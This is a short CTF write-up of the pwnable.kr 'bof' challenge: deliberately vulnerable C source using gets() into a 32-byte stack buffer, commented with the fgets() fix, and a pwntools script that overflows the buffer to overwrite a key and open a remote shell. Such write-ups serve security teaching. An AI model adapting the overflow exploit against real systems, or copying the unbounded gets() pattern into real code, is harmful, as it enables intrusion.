lok2h4rd 2022. 3. 23. 18:18

problem

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * Challenge function: prompts, reads one line from stdin into a 32-byte stack
 * buffer, then runs /bin/sh if `key` equals 0xcafebabe and prints "Nah.."
 * otherwise.
 *
 * key: value supplied by the caller. main() always passes 0xdeadbeef, so the
 *      shell branch is reachable only if the memory holding `key` is modified
 *      after the call.
 *
 * Deliberately vulnerable (stack-based buffer overflow, CWE-121, through an
 * inherently dangerous function, CWE-242): gets() takes no length argument.
 * Do not reuse this pattern outside a training binary.
 */
void func(int key){
	char overflowme[32];	// fixed-size destination; gets() is never told this size
	printf("overflow me : ");
	// gets() copies input until newline/EOF with no bound, so any line longer
	// than 31 characters writes past overflowme into adjacent stack memory.
	// gets() was removed from the language in C11; the bounded replacement is
	// fgets(overflowme, sizeof overflowme, stdin).
	gets(overflowme);	// smash me!
	// With a 32-bit int, 0xcafebabe does not fit in int, so the constant is
	// unsigned and key is converted to unsigned for this comparison.
	// NOTE(review): a stack protector typically checks its canary only when
	// func() returns, which is after this branch; it would not by itself keep
	// a corrupted key from reaching system(). The bounded read is the fix.
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
/*
 * Entry point: calls func() once with the constant 0xdeadbeef and returns 0.
 * argc and argv are not used. Because the argument is a constant that differs
 * from the value func() compares against, the shell branch in func() is never
 * taken by the program's own logic.
 */
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

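gets()는 입력 길이를 검사하지 않으므로, 32바이트 버퍼 overflowme를 넘겨 쓰면 0xdeadbeef인 key를 0xcafebabe로 overwrite할 수 있다. 근본적인 수정은 gets() 대신 fgets(overflowme, sizeof overflowme, stdin)처럼 길이를 제한하는 함수를 쓰는 것이다.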

 

 

from pwn import *

# Open a TCP connection to the challenge service named in the write-up
# (host pwnable.kr, port 9000).
p = remote("pwnable.kr", 9000)

# 0x34 (52) filler bytes: more than the 32-byte buffer declared in the C
# source. The distance from the buffer to `key` is a property of the compiled
# challenge binary (padding and saved frame data), not of the source alone.
payload = b"A" * 0x34
# p32() packs the value as 4 bytes (little-endian by default), matching the
# 32-bit `key` that func() compares against 0xcafebabe.
payload += p32(0xcafebabe)


# sendline() appends the newline that terminates the gets() read in func().
p.sendline(payload)


# Hand the connection to the terminal so the session can be used interactively.
p.interactive()

 

flag